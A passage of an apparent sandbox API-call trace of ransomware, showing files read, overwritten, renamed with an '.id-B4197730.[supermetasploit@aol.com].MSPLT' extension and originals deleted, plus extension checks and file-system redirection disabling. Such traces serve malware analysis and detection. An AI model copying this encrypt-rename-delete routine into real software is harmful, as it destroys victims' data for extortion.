lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.479] WriteFile (in: hFile=0x358, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xea, lpOverlapped=0x0) returned 1 [0181.479] SetEndOfFile (hFile=0x358) returned 1 [0181.479] CloseHandle (hObject=0x358) returned 1 [0181.497] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.497] SetEndOfFile (hFile=0x378) returned 1 [0181.500] CloseHandle (hObject=0x378) returned 1 [0181.500] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0181.501] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 1 [0181.549] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.549] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.549] lstrlenW (lpString=".doc") returned 4 [0181.549] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.549] lstrlenW (lpString=".docx") returned 5 [0181.549] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0181.549] lstrlenW (lpString=".pdf") returned 4 [0181.550] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.550] lstrlenW (lpString=".xls") returned 4 [0181.550] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.550] lstrlenW (lpString=".xlsx") returned 5 [0181.550] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0181.550] lstrlenW (lpString=".ppt") returned 4 [0181.550] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.550] lstrlenW (lpString=".zip") returned 4 [0181.550] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.550] lstrlenW (lpString=".rar") returned 4 [0181.550] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.550] lstrlenW (lpString=".bz2") returned 4 [0181.550] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.550] lstrlenW (lpString=".7z") returned 3 [0181.550] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.550] lstrlenW (lpString=".dbf") returned 4 [0181.550] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.550] lstrlenW (lpString=".1cd") returned 4 [0181.550] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.550] lstrlenW (lpString=".jpg") returned 4 [0181.550] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.550] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.550] lstrlenW (lpString=".doc") returned 4 [0181.550] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.550] lstrlenW (lpString=".docx") returned 5 [0181.550] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0181.550] lstrlenW (lpString=".pdf") returned 4 [0181.550] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.551] lstrlenW (lpString=".xls") returned 4 [0181.551] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.551] lstrlenW (lpString=".xlsx") returned 5 [0181.551] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0181.551] lstrlenW (lpString=".ppt") returned 4 [0181.551] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.551] lstrlenW (lpString=".zip") returned 4 [0181.551] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.551] lstrlenW (lpString=".rar") returned 4 [0181.551] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.551] lstrlenW (lpString=".bz2") returned 4 [0181.551] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.551] lstrlenW (lpString=".7z") returned 3 [0181.551] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.551] lstrlenW (lpString=".dbf") returned 4 [0181.551] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.551] lstrlenW (lpString=".1cd") returned 4 [0181.551] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0181.551] lstrlenW (lpString=".jpg") returned 4 [0181.551] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.551] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0181.551] lstrlenW (lpString="sqmapi.dll") returned 10 [0181.551] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.552] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=144416) returned 1 [0181.552] CloseHandle (hObject=0x348) returned 1 [0181.552] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 0x80 [0181.552] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.552] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0181.552] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.552] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.552] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0181.553] GetLastError () returned 0x0 [0181.553] ReadFile (in: hFile=0x348, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x23420, lpOverlapped=0x0) returned 1 [0182.473] WriteFile (in: hFile=0x38c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0x23430, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0x23430, lpOverlapped=0x0) returned 1 [0182.477] ReadFile (in: hFile=0x348, lpBuffer=0x3c5e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x369fecc, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesRead=0x369fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.477] WriteFile (in: hFile=0x38c, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x369fc94, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fc94*=0xe8, lpOverlapped=0x0) returned 1 [0182.477] SetEndOfFile (hFile=0x38c) returned 1 [0182.478] CloseHandle (hObject=0x38c) returned 1 [0182.485] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.485] SetEndOfFile (hFile=0x348) returned 1 [0182.488] CloseHandle (hObject=0x348) returned 1 [0182.488] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0182.488] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll")) returned 1 [0182.489] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.489] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.489] lstrlenW (lpString=".doc") returned 4 [0182.489] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.489] lstrlenW (lpString=".docx") returned 5 [0182.489] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0182.489] lstrlenW (lpString=".pdf") returned 4 [0182.489] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.489] lstrlenW (lpString=".xls") returned 4 [0182.489] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.489] lstrlenW (lpString=".xlsx") returned 5 [0182.489] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0182.489] lstrlenW (lpString=".ppt") returned 4 [0182.489] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.489] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.489] lstrlenW (lpString=".zip") returned 4 [0182.489] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.490] lstrlenW (lpString=".rar") returned 4 [0182.490] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.490] lstrlenW (lpString=".bz2") returned 4 [0182.490] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.490] lstrlenW (lpString=".7z") returned 3 [0182.490] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.490] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.490] lstrlenW (lpString=".dbf") returned 4 [0182.490] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.490] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.490] lstrlenW (lpString=".1cd") returned 4 [0182.490] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.490] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.490] lstrlenW (lpString=".jpg") returned 4 [0182.490] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.490] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.490] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.490] lstrlenW (lpString=".doc") returned 4 [0182.490] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.490] lstrlenW (lpString=".docx") returned 5 [0182.490] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0182.490] lstrlenW (lpString=".pdf") returned 4 [0182.490] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.490] lstrlenW (lpString=".xls") returned 4 [0182.490] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.490] lstrlenW (lpString=".xlsx") returned 5 [0182.491] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0182.491] lstrlenW (lpString=".ppt") returned 4 [0182.491] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.491] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.491] lstrlenW (lpString=".zip") returned 4 [0182.491] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.491] lstrlenW (lpString=".rar") returned 4 [0182.491] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.491] lstrlenW (lpString=".bz2") returned 4 [0182.491] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.491] lstrlenW (lpString=".7z") returned 3 [0182.491] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.491] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.491] lstrlenW (lpString=".dbf") returned 4 [0182.491] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.491] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.491] lstrlenW (lpString=".1cd") returned 4 [0182.491] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.491] lstrlenW (lpString="C:\\588bce7c90097ed212\\sqmapi.dll") returned 32 [0182.491] lstrlenW (lpString=".jpg") returned 4 [0182.491] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.491] lstrcmpiW (lpString1=".msu", lpString2=".MSPLT") returned 1 [0182.492] lstrlenW (lpString="Windows6.1-KB958488-v6001-x64.msu") returned 33 [0182.492] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0182.492] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x369ff14 | out: lpFileSize=0x369ff14*=5091790) returned 1 [0182.492] CloseHandle (hObject=0x348) returned 1 [0182.492] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu")) returned 0x80 [0182.492] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0182.492] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0182.493] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0182.493] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fc64 | out: lpNewFilePointer=0x0) returned 1 [0182.493] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fc24 | out: lpNewFilePointer=0x0) returned 1 [0182.493] ReadFile (in: hFile=0x348, lpBuffer=0x3c5e058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x369fc30, lpOverlapped=0x0 | out: lpBuffer=0x3c5e058*, lpNumberOfBytesRead=0x369fc30*=0x40000, lpOverlapped=0x0) returned 1 [0182.516] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x19e5ef, lpNewFilePointer=0x0, dwMoveMethod=0x369fc24 | out: lpNewFilePointer=0x0) returned 1 [0182.516] ReadFile (in: hFile=0x348, lpBuffer=0x3c9e058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x369fc30, lpOverlapped=0x0 | out: lpBuffer=0x3c9e058*, lpNumberOfBytesRead=0x369fc30*=0x40000, lpOverlapped=0x0) returned 1 [0182.534] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x369fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0182.534] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x49b1ce, lpNewFilePointer=0x0, dwMoveMethod=0x369fc24 | out: lpNewFilePointer=0x0) returned 1 [0182.534] ReadFile (in: hFile=0x348, lpBuffer=0x3cde058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x369fc30, lpOverlapped=0x0 | out: lpBuffer=0x3cde058*, lpNumberOfBytesRead=0x369fc30*=0x40000, lpOverlapped=0x0) returned 1 [0183.077] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.077] WriteFile (in: hFile=0x348, lpBuffer=0x3c5e020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x369fca8, lpOverlapped=0x0 | out: lpBuffer=0x3c5e020*, lpNumberOfBytesWritten=0x369fca8*=0xc012e, lpOverlapped=0x0) returned 1 [0183.719] SetEndOfFile (hFile=0x348) returned 1 [0183.719] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3ff82b8 [0183.726] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x369fc74 | out: lpNewFilePointer=0x0) returned 1 [0183.726] WriteFile (in: hFile=0x348, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x369fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x369fc80*=0x40000, lpOverlapped=0x0) returned 1 [0183.727] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x19e5ef, lpNewFilePointer=0x0, dwMoveMethod=0x369fc74 | out: lpNewFilePointer=0x0) returned 1 [0183.728] WriteFile (in: hFile=0x348, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x369fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x369fc80*=0x40000, lpOverlapped=0x0) returned 1 [0183.730] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x49b1ce, lpNewFilePointer=0x0, dwMoveMethod=0x369fc74 | out: lpNewFilePointer=0x0) returned 1 [0183.730] WriteFile (in: hFile=0x348, lpBuffer=0x3ff82b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x369fc80, lpOverlapped=0x0 | out: lpBuffer=0x3ff82b8*, lpNumberOfBytesWritten=0x369fc80*=0x40000, lpOverlapped=0x0) returned 1 [0183.733] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ff82b8 | out: hHeap=0x710000) returned 1 [0183.736] CloseHandle (hObject=0x348) returned 1 [0186.504] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0186.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.505] lstrlenW (lpString=".doc") returned 4 [0186.505] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0186.505] lstrlenW (lpString=".docx") returned 5 [0186.505] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0186.505] lstrlenW (lpString=".pdf") returned 4 [0186.505] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0186.505] lstrlenW (lpString=".xls") returned 4 [0186.505] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0186.505] lstrlenW (lpString=".xlsx") returned 5 [0186.505] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0186.505] lstrlenW (lpString=".ppt") returned 4 [0186.505] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0186.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.506] lstrlenW (lpString=".zip") returned 4 [0186.506] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0186.506] lstrlenW (lpString=".rar") returned 4 [0186.506] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0186.506] lstrlenW (lpString=".bz2") returned 4 [0186.506] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0186.506] lstrlenW (lpString=".7z") returned 3 [0186.506] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0186.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.506] lstrlenW (lpString=".dbf") returned 4 [0186.506] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0186.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.506] lstrlenW (lpString=".1cd") returned 4 [0186.506] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0186.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.506] lstrlenW (lpString=".jpg") returned 4 [0186.506] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0186.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.506] lstrlenW (lpString=".doc") returned 4 [0186.506] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0186.506] lstrlenW (lpString=".docx") returned 5 [0186.506] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0186.506] lstrlenW (lpString=".pdf") returned 4 [0186.506] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0186.506] lstrlenW (lpString=".xls") returned 4 [0186.506] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0186.506] lstrlenW (lpString=".xlsx") returned 5 [0186.506] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0186.507] lstrlenW (lpString=".ppt") returned 4 [0186.507] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0186.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.507] lstrlenW (lpString=".zip") returned 4 [0186.507] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0186.507] lstrlenW (lpString=".rar") returned 4 [0186.507] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0186.507] lstrlenW (lpString=".bz2") returned 4 [0186.507] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0186.507] lstrlenW (lpString=".7z") returned 3 [0186.507] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0186.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.507] lstrlenW (lpString=".dbf") returned 4 [0186.507] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0186.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.507] lstrlenW (lpString=".1cd") returned 4 [0186.507] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0186.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 55 [0186.507] lstrlenW (lpString=".jpg") returned 4 [0186.507] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0186.507] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0186.508] lstrlenW (lpString="meiryon_boot.ttf") returned 16 [0186.508] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 20 os_tid = 0x11b4 [0167.275] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x32a1268 [0167.276] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x32b1270 [0167.276] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af78 [0167.276] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d180 [0167.276] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76a258 [0167.276] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x3d6b020 [0167.280] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76a120 [0167.280] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76a120, Size=0x20) returned 0x74e930 [0167.280] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76a300 [0167.280] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76a300, Size=0x20) returned 0x74e958 [0167.280] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0167.280] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0167.280] Wow64DisableWow64FsRedirection (in: OldValue=0x37dff50 | out: OldValue=0x37dff50*=0x0) returned 1 [0167.280] lstrlenW (lpString="kernel32.dll") returned 12 [0167.281] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e930 | out: hHeap=0x710000) returned 1 [0167.281] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0167.281] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e958 | out: hHeap=0x710000) returned 1 [0167.281] Sleep (dwMilliseconds=0x64) [0167.653] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0167.653] lstrlenW (lpString="GetCurrentOOBE.dll") returned 18 [0167.653] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0168.693] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=144072) returned 1 [0168.693] CloseHandle (hObject=0x2f8) returned 1 [0168.693] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 0x20 [0168.693] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.693] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0168.693] SetFilePointerEx (in: hFile=0x2f8, 